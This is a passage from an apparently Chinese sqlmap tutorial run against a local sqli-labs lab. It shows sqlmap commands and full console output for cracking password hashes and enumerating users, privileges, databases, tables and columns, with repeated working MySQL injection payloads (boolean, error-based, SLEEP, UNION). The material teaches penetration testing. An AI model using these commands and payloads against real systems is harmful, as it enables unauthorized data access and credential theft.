Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:19:42] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:19:42] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[08:19:48] [INFO] writing hashes to a temporary file 'xxxxx\sqlmaphashes-us74yp3p.txt'
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]
[08:19:51] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file 'xxxxxx\sqlmapproject-sqlmap-0605f14\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[08:20:01] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[08:21:25] [INFO] starting dictionary-based cracking (mysql_passwd)
[08:21:25] [INFO] starting 8 processes
[' for user '08:21:46root] ['FO] cracked password '] current status: 2arxd... -root
[INFO08:21:49] cracked password '] [rootINFO' for user '] current status: 50519... |root'
database management system users password hashes:
[*] xxxxxx [1]:
password hash: *81F5E21E35407D884A6CD4A731AEBFB6XXXXXXXX
clear-text password: xxxxxxxx
[08:22:23] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:22:23 /2020-03-02/
显然,探测出了hash密码和原明文密码。
sqlmap枚举DBMS用户
参数:
--users
获取DBMS所有用户。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --users
打印
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:28:07 /2020-03-02/
[08:28:07] [INFO] resuming back-end DBMS 'mysql'
[08:28:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0
x71786a7071)-- -
---
[08:28:07] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:28:07] [INFO] fetching database users
[08:28:07] [INFO] retrieved: ''root'@'localhost''
[08:28:07] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
[08:28:08] [INFO] retrieved: ''root'@'localhost''
database management system users [1]:
[*] 'root'@'localhost'
[08:28:08] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:28:08 /2020-03-02/
探测出一个用户。
sqlmap枚举DBMS权限
参数:
--privileges
当前用户有读取数据库管理系统中用户信息的系统表的权限时,使用这一参数可以列举数据库管理系统中用户的权限,通过用户权限可以判断哪些用户是管理员。
若想只枚举特定用户的权限使用参数-U指定用户,可用-CU来代表当前用户。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --priviledges -U root
打印
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:33:51 /2020-03-02/
[08:33:52] [INFO] resuming back-end DBMS 'mysql'
[08:33:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:33:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:33:52] [INFO] fetching database users privileges
[08:33:52] [INFO] retrieved: ''root'@'localhost'','SELECT'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','INSERT'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','UPDATE'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','DELETE'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','CREATE'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','DROP'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','RELOAD'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','SHUTDOWN'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','PROCESS'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','FILE'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','REFERENCES'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','INDEX'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','ALTER'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','SHOW DATABASES'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','SUPER'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','CREATE TEMPORARY TABLES'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','LOCK TABLES'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','EXECUTE'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','REPLICATION SLAVE'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','REPLICATION CLIENT'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','CREATE VIEW'
[08:33:52] [INFO] retrieved: ''root'@'localhost'','SHOW VIEW'
[08:33:53] [INFO] retrieved: ''root'@'localhost'','CREATE ROUTINE'
[08:33:53] [INFO] retrieved: ''root'@'localhost'','ALTER ROUTINE'
[08:33:53] [INFO] retrieved: ''root'@'localhost'','CREATE USER'
[08:33:53] [INFO] retrieved: ''root'@'localhost'','EVENT'
[08:33:53] [INFO] retrieved: ''root'@'localhost'','TRIGGER'
[08:33:53] [INFO] retrieved: ''root'@'localhost'','CREATE TABLESPACE'
database management system users privileges:
[*] 'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[08:33:53] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:33:53 /2020-03-02/
显然,该用户有所有权限。
二、sqlmap枚举信息
1.sqlmap列举数据库名
参数:
--dbs
列举数据库名称。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs
打印
___
__H__
___ ___[,]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:36:22 /2020-03-02/
[08:36:23] [INFO] resuming back-end DBMS 'mysql'
[08:36:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:36:23] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:36:23] [INFO] fetching database names
[08:36:23] [INFO] retrieved: 'information_schema'
[08:36:23] [INFO] retrieved: 'challenges'
[08:36:23] [INFO] retrieved: 'demo'
[08:36:23] [INFO] retrieved: 'demo1125'
[08:36:23] [INFO] retrieved: 'demo1204'
[08:36:23] [INFO] retrieved: 'dvwa'
[08:36:23] [INFO] retrieved: 'jingdong'
[08:36:23] [INFO] retrieved: 'mysql'
[08:36:23] [INFO] retrieved: 'performance_schema'
[08:36:23] [INFO] retrieved: 'pythontest'
[08:36:23] [INFO] retrieved: 'security'
[08:36:23] [INFO] retrieved: 'sys'
available databases [12]:
[*] challenges
[*] demo
[*] demo1125
[*] demo1204
[*] dvwa
[*] information_schema
[*] jingdong
[*] mysql
[*] performance_schema
[*] pythontest
[*] security
[*] sys
[08:36:23] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:36:23 /2020-03-02/
显然,列举出了所有数据库,包括默认的和自己创建的数据库。
2.sqlmap枚举数据库表
参数:
--tables
-D 数据库名字可以指定具体数据库
列举数据库表名。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --tables
打印
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:41:09 /2020-03-02/
[08:41:09] [INFO] resuming back-end DBMS 'mysql'
[08:41:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:41:09] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:41:09] [INFO] fetching database names
[08:41:09] [INFO] resumed: 'information_schema'
[08:41:09] [INFO] resumed: 'challenges'
[08:41:09] [INFO] resumed: 'demo'
[08:41:09] [INFO] resumed: 'demo1125'
[08:41:09] [INFO] resumed: 'demo1204'
[08:41:09] [INFO] resumed: 'dvwa'
[08:41:09] [INFO] resumed: 'jingdong'
[08:41:09] [INFO] resumed: 'mysql'
[08:41:09] [INFO] resumed: 'performance_schema'
[08:41:09] [INFO] resumed: 'pythontest'
[08:41:09] [INFO] resumed: 'security'
[08:41:09] [INFO] resumed: 'sys'
[08:41:09] [INFO] fetching tables for databases: 'challenges, demo, demo1125, demo1204, dvwa, information_schema, jingdong, mysql, performance_schema, pythontest, security, sys'
[08:41:10] [INFO] retrieved: 'information_schema','CHARACTER_SETS'
[08:41:10] [INFO] retrieved: 'information_schema','COLLATIONS'
[08:41:10] [INFO] retrieved: 'information_schema','COLLATION_CHARACTER_SET_APPLICABILITY'
...
[08:41:21] [INFO] retrieved: 'sys','x$waits_by_host_by_latency'
[08:41:21] [INFO] retrieved: 'sys','x$waits_by_user_by_latency'
[08:41:21] [INFO] retrieved: 'sys','x$waits_global_by_latency'
Database: information_schema
[61 tables]
+------------------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| ... |
+------------------------------------------------------+
Database: challenges
[1 table]
+------------------------------------------------------+
| fespr0fqgc |
+------------------------------------------------------+
Database: demo
[32 tables]
+------------------------------------------------------+
| user |
| article |
| bank1 |
| bank2 |
| book |
| class |
| classes |
| demo1 |
| demo2 |
| dept |
| emp |
| login_lg_log |
| login_lg_log_test |
| login_log |
| login_log_hash |
| login_log_hash2 |
| login_log_list |
| login_log_range |
| login_log_range2 |
| money |
| mylock |
| phone |
| staffs |
| students |
| tbla |
| test |
| test1 |
| test2 |
| test3 |
| test4 |
| test_innodb_lock |
| test_memory |
+------------------------------------------------------+
Database: demo1125
[6 tables]
+------------------------------------------------------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+------------------------------------------------------+
Database: demo1204
[1 table]
+------------------------------------------------------+
| classes |
+------------------------------------------------------+
Database: dvwa
[2 tables]
+------------------------------------------------------+
| guestbook |
| users |
+------------------------------------------------------+
Database: jingdong
[2 tables]
+------------------------------------------------------+
| goods |
| goods_cates |
+------------------------------------------------------+
Database: mysql
[31 tables]
+------------------------------------------------------+
| user |
| columns_priv |
| ... |
| time_zone_transition_type |
+------------------------------------------------------+
Database: performance_schema
[87 tables]
+------------------------------------------------------+
| accounts |
| cond_instances |
| events_stages_current |
| ... |
| variables_by_thread |
+------------------------------------------------------+
Database: security
[4 tables]
+------------------------------------------------------+
| emails |
| referers |
| uagents |
| users |
+------------------------------------------------------+
Database: sys
[101 tables]
+------------------------------------------------------+
| session |
| version |
| host_summary |
| ... |
+------------------------------------------------------+
[08:41:21] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:41:21 /2020-03-02/
指定数据库探测表:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 --tables
打印
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:47:30 /2020-03-02/
[08:47:30] [INFO] resuming back-end DBMS 'mysql'
[08:47:30] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:47:30] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:47:30] [INFO] fetching tables for database: 'demo1125'
[08:47:30] [INFO] retrieved: 'areas'
[08:47:30] [INFO] retrieved: 'cities'
[08:47:30] [INFO] retrieved: 'classes'
[08:47:30] [INFO] retrieved: 'provinces'
[08:47:30] [INFO] retrieved: 'student'
[08:47:30] [INFO] retrieved: 'v_p_c'
Database: demo1125
[6 tables]
+-----------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+-----------+
[08:47:30] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:47:30 /2020-03-02/
只探测了指定数据库中的表。
3.sqlmap枚举数据表列
参数:
--columns
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 --tables --columns
打印
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:51:31 /2020-03-02/
[08:51:32] [INFO] resuming back-end DBMS 'mysql'
[08:51:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:51:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:51:32] [INFO] fetching tables for database: 'demo1125'
[08:51:32] [INFO] resumed: 'areas'
[08:51:32] [INFO] resumed: 'cities'
[08:51:32] [INFO] resumed: 'classes'
[08:51:32] [INFO] resumed: 'provinces'
[08:51:32] [INFO] resumed: 'student'
[08:51:32] [INFO] resumed: 'v_p_c'
Database: demo1125
[6 tables]
+-----------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+-----------+
[08:51:32] [INFO] fetching columns for table 'areas' in database 'demo1125'
[08:51:32] [INFO] retrieved: 'id','int(5) unsigned'
[08:51:32] [INFO] retrieved: 'pid','int(5) unsigned'
[08:51:32] [INFO] retrieved: 'name','varchar(120)'
[08:51:32] [INFO] retrieved: 'type','tinyint(1)'
[08:51:32] [INFO] fetching columns for table 'cities' in database 'demo1125'
[08:51:32] [INFO] retrieved: 'id','int(11)'
[08:51:32] [INFO] retrieved: 'cityid','char(6)'
[08:51:32] [INFO] retrieved: 'city','varchar(40)'
[08:51:32] [INFO] retrieved: 'provinceid','char(6)'
[08:51:32] [INFO] fetching columns for table 'classes' in database 'demo1125'
[08:51:32] [INFO] retrieved: 'id','int(4)'
[08:51:32] [INFO] retrieved: 'name','varchar(36)'
[08:51:32] [INFO] fetching columns for table 'provinces' in database 'demo1125'
[08:51:32] [INFO] retrieved: 'id','int(11)'
[08:51:32] [INFO] retrieved: 'provinceid','int(11)'
[08:51:32] [INFO] retrieved: 'province','varchar(100)'
[08:51:32] [INFO] fetching columns for table 'student' in database 'demo1125'
[08:51:32] [INFO] retrieved: 'sid','int(4)'
[08:51:32] [INFO] retrieved: 'sname','varchar(36)'
[08:51:32] [INFO] retrieved: 'gid','int(4)'
[08:51:32] [INFO] fetching columns for table 'v_p_c' in database 'demo1125'
[08:51:32] [INFO] retrieved: 'id','int(5) unsigned'
[08:51:32] [INFO] retrieved: 'pid','int(5) unsigned'
[08:51:32] [INFO] retrieved: 'name','varchar(120)'
[08:51:32] [INFO] retrieved: 'type','tinyint(1)'
[08:51:32] [INFO] retrieved: 'cname','varchar(120)'
Database: demo1125
Table: areas
[4 columns]
+--------+-----------------+
| Column | Type |
+--------+-----------------+
| id | int(5) unsigned |
| name | varchar(120) |
| pid | int(5) unsigned |
| type | tinyint(1) |
+--------+-----------------+
Database: demo1125
Table: cities
[4 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| city | varchar(40) |
| cityid | char(6) |
| id | int(11) |
| provinceid | char(6) |
+------------+-------------+
Database: demo1125
Table: classes
[2 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| id | int(4) |
| name | varchar(36) |
+--------+-------------+
Database: demo1125
Table: provinces
[3 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| id | int(11) |
| province | varchar(100) |
| provinceid | int(11) |
+------------+--------------+
Database: demo1125
Table: student
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| gid | int(4) |
| sid | int(4) |
| sname | varchar(36) |
+--------+-------------+
Database: demo1125
Table: v_p_c
[5 columns]
+--------+-----------------+
| Column | Type |
+--------+-----------------+
| cname | varchar(120) |
| id | int(5) unsigned |
| name | varchar(120) |
| pid | int(5) unsigned |
| type | tinyint(1) |
+--------+-----------------+
[08:51:32] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:51:33 /2020-03-02/
显然,探测了该数据库种所有表的字段。
指定表探测字段:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 --tables -T student --columns
打印
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:53:57 /2020-03-02/
[08:53:57] [INFO] resuming back-end DBMS 'mysql'
[08:53:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:53:57] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[08:53:58] [INFO] fetching tables for database: 'demo1125'
[08:53:58] [INFO] resumed: 'areas'
[08:53:58] [INFO] resumed: 'cities'
[08:53:58] [INFO] resumed: 'classes'
[08:53:58] [INFO] resumed: 'provinces'
[08:53:58] [INFO] resumed: 'student'
[08:53:58] [INFO] resumed: 'v_p_c'
Database: demo1125
[6 tables]
+-----------+
| areas |
| cities |
| classes |
| provinces |
| student |
| v_p_c |
+-----------+
[08:53:58] [INFO] fetching columns for table 'student' in database 'demo1125'
[08:53:58] [INFO] resumed: 'sid','int(4)'
[08:53:58] [INFO] resumed: 'sname','varchar(36)'
[08:53:58] [INFO] resumed: 'gid','int(4)'
Database: demo1125
Table: student
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| gid | int(4) |
| sid | int(4) |
| sname | varchar(36) |
+--------+-------------+
[08:53:58] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:53:58 /2020-03-02/
显然,只探测了指定表中的字段。
4.sqlmap枚举数据值
参数:
--dump
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D demo1125 --tables -T student --columns --dump
打印
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:56:31 /2020-03-02/
[08:56:31] [INFO] resuming back-end DBMS 'mysql'
[08:56:31] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
